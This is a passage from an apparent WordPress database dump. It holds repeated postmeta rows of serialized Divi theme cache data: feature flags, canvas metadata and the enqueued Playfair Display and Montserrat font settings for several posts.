:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32668,555,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32669,555,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32670,555,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32671,555,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32672,798,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32673,798,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32674,798,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32666,946,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32667,946,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32661,1057,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32662,1057,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32663,1057,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32664,946,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32665,946,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32657,577,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32658,577,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32659,577,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32660,1057,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32656,577,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32648,1043,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32649,1043,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32650,1043,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32651,1043,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32652,1247,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32653,1247,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32654,1247,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32655,1247,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32644,681,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32645,681,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32646,681,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32647,681,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32643,689,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32639,704,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32640,689,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32641,689,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32642,689,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32635,1109,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32636,704,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32637,704,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32638,704,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32623,767,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32624,683,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32625,683,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32626,683,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32627,683,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32628,1440,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32629,1440,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32630,1440,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32631,1440,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32632,1109,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32633,1109,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32634,1109,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32622,767,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\"